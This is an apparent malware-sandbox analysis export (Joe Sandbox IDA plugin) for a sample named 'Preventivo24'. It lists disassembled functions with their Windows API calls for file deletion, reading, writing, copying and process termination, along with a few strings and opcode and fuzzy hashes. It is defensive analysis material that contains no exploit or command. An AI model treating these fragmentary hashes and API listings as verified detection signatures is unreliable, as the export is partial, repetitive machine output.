DeleteFileW.KERNEL32(?,26FBC52C), ref: 00B427DD
GetLastError.KERNEL32 ref: 00B427E5
RemoveDirectoryW.KERNEL32(?,26FBC52C), ref: 00B4284D
GetLastError.KERNEL32 ref: 00B42855

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: ErrorLast$DeleteDirectoryFileRemove
String ID:
API String ID: 50330452-0
Opcode ID: 08a0e39443bd806ddc3fe5e61e53710e25598e3c48481f7abf622592fc09b39c
Instruction ID: 027fef93790b827efbfcbdadc75345b1d5b9e3f48c8ffbd80d6e8b23911903f8
Opcode Fuzzy Hash: 08a0e39443bd806ddc3fe5e61e53710e25598e3c48481f7abf622592fc09b39c
Instruction Fuzzy Hash: D7518D31900219CFDF14CFA4C888BAEBBF0FF15300F5545E9E915AB255DB34AA48EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B38DD0 Relevance: 6.2, APIs: 4, Instructions: 159fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,26FBC52C,?,00000010,?,00B3D2A0,000000FF), ref: 00B38E36
SetFilePointer.KERNEL32(00000000,?,00000010,00000000), ref: 00B38E7F
ReadFile.KERNEL32(00000000,26FBC52C,?,000000FF,00000000,00000078,?), ref: 00B38EC1
FindCloseChangeNotification.KERNEL32(00000000), ref: 00B38F58

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: File$ChangeCloseCreateFindNotificationPointerRead
String ID:
API String ID: 2405668454-0
Opcode ID: 8ea88009661350db1ba87edb09a85c583d5ec1ab6c14ce9052874ac1593b0f6a
Instruction ID: f5789b6135cc1e8c2021553ff66a27998e7e8591c881aa8e9194c6ff016c4747
Opcode Fuzzy Hash: 8ea88009661350db1ba87edb09a85c583d5ec1ab6c14ce9052874ac1593b0f6a
Instruction Fuzzy Hash: 9651B171A00219DBDB11CB98CC48BAEBBF9EF08324F244299F925B72D1CB749D45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B27F80 Relevance: 6.1, APIs: 4, Instructions: 96fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B27A40: SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,26FBC52C,00000000,00000000,?), ref: 00B27A9B

GetFileVersionInfoSizeW.KERNELBASE(?,00000000,?,26FBC52C,00000000,?,?,?,?,00000000,00C58075,000000FF,00000000,00B27F36,?), ref: 00B27FCD
GetFileVersionInfoW.KERNELBASE(?,00000000,00C58075,00000000,00000000,?,?,00000000,00C58075,000000FF,00000000,00B27F36,?), ref: 00B27FF9
GetLastError.KERNEL32(?,?,00000000,00C58075,000000FF,00000000,00B27F36,?), ref: 00B2803E
DeleteFileW.KERNEL32(?), ref: 00B28051

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: File$InfoVersion$DeleteErrorFolderLastPathSize
String ID:
API String ID: 2825328469-0
Opcode ID: af225405c4fab11bc55363446edec1d93ac6274430ace52bf6339790298acdbf
Instruction ID: 5a91f279b1d755442ed45da72bb2f253e6caed03401c915e9356c954bc9ed7c5
Opcode Fuzzy Hash: af225405c4fab11bc55363446edec1d93ac6274430ace52bf6339790298acdbf
Instruction Fuzzy Hash: C1316D71901219ABDB10CFA5DD84BEFBBF8FF08350F1401A9E819A3281DB359A44CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B1D900 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 387COMMON

Download Yara Rule

APIs

Part of subcall function 009EB400: GetProcessHeap.KERNEL32 ref: 009EB455

PathIsUNCW.SHLWAPI(?,?), ref: 00B1DACD

Strings

\\?\, xrefs: 00B1DAAF, 00B1DAB5
\\?\UNC\, xrefs: 00B1D9A9, 00B1DA31, 00B1DA37

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: HeapPathProcess
String ID: \\?\$\\?\UNC\
API String ID: 300331711-3019864461
Opcode ID: e5ea4757856093de6c7c8659124012ec1d4a94b88f73b9907074acbdc3d6ffa8
Instruction ID: 99d0754fe089417a2dd94a0f22e0da3fbea7dc1ddb70d012bef27014d9d67b0d
Opcode Fuzzy Hash: e5ea4757856093de6c7c8659124012ec1d4a94b88f73b9907074acbdc3d6ffa8
Instruction Fuzzy Hash: FDD1C031A006099BDB00DBA8CC94BEEB7F5EF48320F548269E525E73D1DB74AD45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B5EB70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 198fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,26FBC54C,00000000,00000000,-00000002,00CBD178,?,?,26FBC52C,00C62006,000000FF), ref: 00B5EC30

Part of subcall function 009EB400: GetProcessHeap.KERNEL32 ref: 009EB455

Part of subcall function 00B20AF0: FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000,26FBC52C,?,00000000), ref: 00B20B3B
Part of subcall function 00B20AF0: GetLastError.KERNEL32(?,00000000), ref: 00B20B45

Strings

Downloading of updates failed. Error:, xrefs: 00B5ECB7
upd, xrefs: 00B5EBAF

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: CopyErrorFileFormatHeapLastMessageProcess
String ID: Downloading of updates failed. Error:$upd
API String ID: 2459518595-329979656
Opcode ID: bcb268d1fc112643a13094e34504b573bd22e992d0be9fbf6b2b0e7b027acee8
Instruction ID: b3afc403b1506f6025b69d61daaf58aebf3ea27e1948287ad12f2fc3c96a99d7
Opcode Fuzzy Hash: bcb268d1fc112643a13094e34504b573bd22e992d0be9fbf6b2b0e7b027acee8
Instruction Fuzzy Hash: A471D535A00249DBDB18DF68CC55BAE77B5FF44311F1482ACE8269B2D1DB34AE09CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B465E0 Relevance: 4.7, APIs: 3, Instructions: 208fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,?,?,00000000,26FBC52C,?,?), ref: 00B46647
ReadFile.KERNEL32(?,00000000,00000018,?,00000000), ref: 00B46769

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: File$PointerRead
String ID:
API String ID: 3154509469-0
Opcode ID: 99105aa44ac0f9953cb6f5b7d78085afa0d2014e4df441091321175ad39a1105
Instruction ID: 12e3d45a120c35c293733333cdfeedb2177c9467e61e2c75c005fdaa2baf0f0e
Opcode Fuzzy Hash: 99105aa44ac0f9953cb6f5b7d78085afa0d2014e4df441091321175ad39a1105
Instruction Fuzzy Hash: 71718071D046099FDB00DFA8D845BAEBBF4FF49320F14436AE825A7390DB74AA01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B42EF0 Relevance: 4.7, APIs: 3, Instructions: 196fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,26FBC52C,00000000,00000010,?,00000010,?), ref: 00B42F8B
GetLastError.KERNEL32 ref: 00B42FCD
GetLastError.KERNEL32(?), ref: 00B43071

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: ErrorLast$CreateFile
String ID:
API String ID: 1722934493-0
Opcode ID: bf4bb2176ad3b1b9151abb81942adbaaf306827006cabc11a6b5a04374bf0e28
Instruction ID: a11731cc21623511046dc3532d385cf5a0b55097c17a4879a611cf85804fe939
Opcode Fuzzy Hash: bf4bb2176ad3b1b9151abb81942adbaaf306827006cabc11a6b5a04374bf0e28
Instruction Fuzzy Hash: AA61E131A00606EFDB14DB28D845BAAF3F4FF44320F144799E825A72D1EB71BA05DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B7BAA0 Relevance: 4.7, APIs: 3, Instructions: 185fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00B7CA81,40000000,00000001,00000000,00000002,00000080,00000000,26FBC52C,?,?), ref: 00B7BB02
WriteFile.KERNEL32(00000000,?,0000C800,0000C800,00000000,?,0000C800), ref: 00B7BBA8
CloseHandle.KERNEL32(00000000,?,0000C800), ref: 00B7BC1C

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: File$CloseCreateHandleWrite
String ID:
API String ID: 1065093856-0
Opcode ID: 31389e025353e2d53d17bf00e401881ae5d1f5e3ce8a0aa109131cfde143259a
Instruction ID: e352ec02e2000008cdd30f14935c7fe74e79d5b66ada392eaec99e7ab618d4c9
Opcode Fuzzy Hash: 31389e025353e2d53d17bf00e401881ae5d1f5e3ce8a0aa109131cfde143259a
Instruction Fuzzy Hash: 05516E71901209AFDB14DFA8D945FAEBBF9EF48314F108259F815A7290DB759E00CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00B1DD10 Relevance: 4.7, APIs: 3, Instructions: 185COMMON

Download Yara Rule

APIs

PathIsUNCW.SHLWAPI(?,26FBC52C,00000000,00000000,?,?,00C568C5,000000FF,?,00B48553,?,00000000,00000000), ref: 00B1DD5B
CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00CB3928,00000001), ref: 00B1DE1A
GetLastError.KERNEL32 ref: 00B1DE28

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: CreateDirectoryErrorLastPath
String ID:
API String ID: 953296794-0
Opcode ID: d8119416a338030cafc568366d5275164576b2064c2a9391506bb0426ea79b59
Instruction ID: d6cb5934b60b117bce376ecd168b679a44862896920d8fe5bb23ae913c400e1e
Opcode Fuzzy Hash: d8119416a338030cafc568366d5275164576b2064c2a9391506bb0426ea79b59
Instruction Fuzzy Hash: 2561AB31A00609DFDF04DFA8C889BEEB7F0FF58320F5445A9E415A7291DB34AA45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B5ABE0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 149COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00B5AC40

Strings

GET, xrefs: 00B5ADFC
HTTP/1.0, xrefs: 00B5BC34

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: ErrorLast
String ID: GET$HTTP/1.0
API String ID: 1452528299-2233155769
Opcode ID: ab5089a21823299ee215b53a21bd21846dd240bf2c6a63d948d6f26b3e5908bc
Instruction ID: 25bbc7f86eb7b4696f62ee01770de48dad63e48744f8c142a73cfe80276e49fa
Opcode Fuzzy Hash: ab5089a21823299ee215b53a21bd21846dd240bf2c6a63d948d6f26b3e5908bc
Instruction Fuzzy Hash: 714195719006199FDB11EFA5CC45BAFB7F8EF44311F1046A9E811F7291EB789E048BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B49D60 Relevance: 4.6, APIs: 3, Instructions: 91fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,00000000,?,00000000,80004005,?,?,?,?,?,?), ref: 00B49D85
CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,00000080,00000000,26FBC52C,00000000,00000000,80004005,?,?,?,?,?), ref: 00B49DFD
CloseHandle.KERNEL32(?,?,00CA27D0), ref: 00B49E66

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: File$CloseCreateDeleteHandle
String ID:
API String ID: 3273607511-0
Opcode ID: 550774ae4f0514afcc9aa944eba697c4e45f62e7cc0b3f17d76143cd11274642
Instruction ID: 5ad250ef35ddc1f8734f66b9e900089562d94e26e43d35c135557e444e2cbb6f
Opcode Fuzzy Hash: 550774ae4f0514afcc9aa944eba697c4e45f62e7cc0b3f17d76143cd11274642
Instruction Fuzzy Hash: 1931F371940218DBCB24CF54DD45BEFB7F4FB04310F1086B9E96AAB690D7B02A44CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B41D50 Relevance: 4.5, APIs: 3, Instructions: 28threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00B41D59
DestroyWindow.USER32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00C5B9A0), ref: 00B41D68
IsWindow.USER32(?), ref: 00B41D93

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Window$CurrentDestroyThread
String ID:
API String ID: 2303547079-0
Opcode ID: b0c3b05a23e2ba7afe9c26909afd47670cc8c56a6164996ae8f048f39575b836
Instruction ID: f79f8bfe7ea56ee8a4bb28b4f224e5470acb7a77f8f0670f86c288823b401245
Opcode Fuzzy Hash: b0c3b05a23e2ba7afe9c26909afd47670cc8c56a6164996ae8f048f39575b836
Instruction Fuzzy Hash: B5F05EB04017409FD3709B28EA48B527BE5BB05B01F04099CE086C6A90CB70E480DB68

Uniqueness

Uniqueness Score: -1.00%

Function 00BF5E30 Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00BF5E2A,?,?,?,?,26FBC52C), ref: 00BF5E41
TerminateProcess.KERNEL32(00000000,?,00BF5E2A,?,?,?,?,26FBC52C), ref: 00BF5E48
ExitProcess.KERNEL32 ref: 00BF5E5A

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 9450dc1384391355ff04a6348477c5cdb643b0b46d34c8dbb2705d9e6242a024
Instruction ID: 9e4b7d71d90de3ef1d829aedcb834b06116525ccf2295784ae755e124e1569af
Opcode Fuzzy Hash: 9450dc1384391355ff04a6348477c5cdb643b0b46d34c8dbb2705d9e6242a024
Instruction Fuzzy Hash: 4DD06C31004A0CEBCF222F75DD0DAAE3F6ABE40341B454164BB194A132DB369A9ADA80

Uniqueness

Uniqueness Score: -1.00%

Function 00B1E190 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 239COMMON

Download Yara Rule

APIs

Part of subcall function 009EB400: GetProcessHeap.KERNEL32 ref: 009EB455

SHGetSpecialFolderPathW.SHELL32(00000000,?,00000025,00000000,26FBC52C,00000000,00000000), ref: 00B1E352

Part of subcall function 00B1E430: GetEnvironmentVariableW.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,80004005), ref: 00B1E43D

